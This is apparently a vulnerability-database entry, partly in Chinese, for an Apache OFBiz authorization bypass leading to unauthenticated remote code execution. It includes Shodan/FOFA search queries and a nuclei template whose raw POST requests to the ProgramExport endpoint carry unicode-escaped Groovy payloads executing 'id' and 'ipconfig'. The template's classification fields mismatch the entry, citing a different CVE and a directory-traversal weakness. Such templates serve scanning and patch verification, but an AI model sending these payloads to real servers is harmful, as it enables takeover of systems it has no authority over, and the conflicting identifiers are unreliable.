Apache OFBiz Incorrect Authorization - Remote Code Execution

漏洞信息

漏洞名称： Apache OFBiz Incorrect Authorization - Remote Code Execution

漏洞编号：

• CVE： CVE-2024-38856

漏洞类型： 权限绕过

漏洞等级： 严重

漏洞描述： Apache OFBiz是一个开源的企业资源规划（ERP）系统，广泛应用于企业级服务中，提供包括电子商务、供应链管理、客户关系管理等多种功能。由于其灵活性和可扩展性，OFBiz在全球范围内被众多企业采用。该漏洞存在于Apache OFBiz的授权机制中，具体表现为不正确授权漏洞。攻击者可以利用此漏洞，在未经身份验证的情况下，通过特定的HTTP请求绕过授权检查，执行屏幕渲染代码。这一漏洞的技术根源在于屏幕定义未明确检查用户权限，而是依赖于端点的配置。由于该漏洞允许远程代码执行，攻击者可以完全控制系统，访问敏感数据，甚至可能导致服务中断。此漏洞的利用无需认证，且可以自动化执行，因此对使用受影响版本的系统构成了严重威胁。

产品厂商： Apache

产品名称： Apache OFBiz

影响版本： through 18.12.14

搜索语法： app=”Apache_OFBiz”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/ddccc8db6f1bfa7bced1074aa2ff13b42aad7af8/http%2Fcves%2F2024%2FCVE-2024-38856.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2024-38856

info:
  name: Apache OFBiz Incorrect Authorization - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  impact: |
    An attacker can exploit this directory traversal vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.  
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    cve-id: CVE-2024-32113
    cvss-score: 9.8
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    epss-score: 0.93490
    epss-percentile: 0.99819
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Apache_OFBiz"
    shodan-query: 'title:"OFBiz"'
    product: ofbiz
    vendor: apache
  tags: cve,cve2024,apache,ofbiz,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
        condition: or

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200